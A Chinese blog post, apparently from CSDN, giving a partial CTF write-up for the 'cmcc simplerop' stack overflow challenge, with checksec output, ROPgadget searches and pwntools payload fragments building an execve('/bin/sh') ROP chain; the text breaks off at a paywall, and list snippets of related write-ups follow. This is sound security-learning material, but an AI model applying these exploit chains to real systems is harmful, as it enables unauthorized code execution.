cmcc Simplerop

最新推荐文章于 2024-01-12 21:43:07 发布
最新推荐文章于 2024-01-12 21:43:07 发布
阅读量3.9k 收藏 1
点赞数 1
分类专栏: pwn题 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/123547177
版权

题目来源

1. 安全策略

[*] '/root/ctf/buuctf/pwn/simplerop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

2. 分析

程序的功能很简单,接收一段用户的输入,向大小为32的栈中最多可以写入100个字节的数据。是很明显的rop的题目。

ret2libc

首先可以考虑ret2libc的方式。但是这题没有got和plt表,这里我没有找到方法去泄露libc地址,因此放弃了这种方式

方法一 execve

然后考虑execve("/bin/sh",0,0)的方式获取shell。

  • 利用ropgadget寻找gadget
    root@kali:~/ctf/buuctf/pwn# ROPgadget --binary simplerop --only "int"
Gadgets information
============================================================
0x080493e1 : int 0x80

Unique gadgets found: 1

root@kali:~/ctf/buuctf/pwn# ROPgadget --binary simplerop --only "pop|ret" | grep eax
0x0809da8a : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bae06 : pop eax ; ret
0x08071e3a : pop eax ; ret 0x80e
0x0809da89 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
    因此的话可以构造出来payload来出发0xb系统调用
    exevce = p32(pop_eax_ret) + p32(0xb) + p32(int_80)
payload = p32(pop_edx_ecx_eax_ret) + p32(0) + p32(0) + p32(binsh) + execve
  • 继续分析发现程序中找不到binsh字符串,因此考虑利用read函数将/bin/sh写入到bss段中。
    # read(0, binsh, 0x8)
read = 0x0806cd50
binsh = 0x080eaf80
payload = p32(read) + p32(retn) + p32(0) + p32(binsh) + p32(0x8)
  • 合并上面两个payload
    payload = cyclic(32)
payload += p32(read) + p32(retn) + p32(0) + p32(binsh) + p32(0x8)
payload += p32(pop_edx_ecx_eax_ret) + p32
最低0.47元/天 解锁文章
Morphy_Amo
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CMCC--simplerop 题解
lifanxin的博客
03-28 1541
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
cmcc_simplerop解题过程
weixin_55013445的博客
09-24 173
cmcc_simplerop解题流程
cmcc_simplerop
个人笔记
05-08 115
int80(11,“/bin/sh”,null,null),后面的四个参数分别是eax、ebx、ecx、edx。由于未开启PIE,我们利用simplerop中的read()函数写入bss段。2、ROPgadget找寄存器。偏移:0x14+4(错误)
【pwn】cmcc_simplerop --rop链的构造
question55的博客
01-12 556
程序保护情况检查32位程序,堆栈不可执行主函数:左边又是一堆函数,file看一下发现是静态链接,那ret2libc不用考虑了,接着看一下有没有int 80那可以考虑利用rop链调用execve函数,用系统调用的函数参数是存在寄存器中的,但是本程序找不到/bin/sh的字符串,可以利用read函数读入/bin/sh字符串然后就是找gadgetexp:from pwn import *context(os='linux',arch='i386',log_level='debug')io=remote("node
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.csdn.net/A951860555/article/details/115286266
CMCC客户端
05-15
"CMCC客户端"是一款专为中国移动用户设计的无线网络连接工具,主要功能是帮助用户方便快捷地接入CMCC(China Mobile Communications Corporation,中国移动)提供的Wi-Fi网络服务。这款客户端简化了传统的Wi-Fi连接...
cmcc客户端
11-20
"cmcc客户端"是一款专为中国移动的无线网络(CMCC)设计的软件,它使得用户无需通过网页登录的方式来接入和使用CMCC的Wi-Fi服务。这个客户端简化了连接过程,提高了用户使用的便捷性,尤其在公共场合如机场、火车站...
cmcc-LTE题库
10-19
cmccLTE考试题库,基本涵盖CMCC各类认证考试知识框架,经过整理分类便于学习
BUUCTF:cmcc_simplerop(write up)
qq_44768749的博客
08-26 780
BUUCTF:cmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 476
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
[BUUCTF]PWN——CmmC_Simplerop
mcmuyanga的博客
11-07 244
cmcc_simplerop 附件 步骤 例行检查,32位,开启了nx保护 本地试运行一下程序,查看一下大概的情况 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序 参数v4明显的溢出漏洞 对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址, 在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprote
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 448
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 362
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.csdn.net/mcmuyanga/article/details/109260008 文件名给了提示,使用
HITCON-trainning&寒假做题记录
Peanuts
01-28 657
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 895
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
cmcc wifi字典文件
最新发布
02-03
CMCC WiFi字典文件是中国移动通信公司推出的一种用于WiFi连接的辅助工具。该文件包含了大量的WiFi网络名称和密码对的组合,用户可以通过这些密码尝试连接到需要输入密码的WiFi网络,提高连接成功的概率。 这些密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值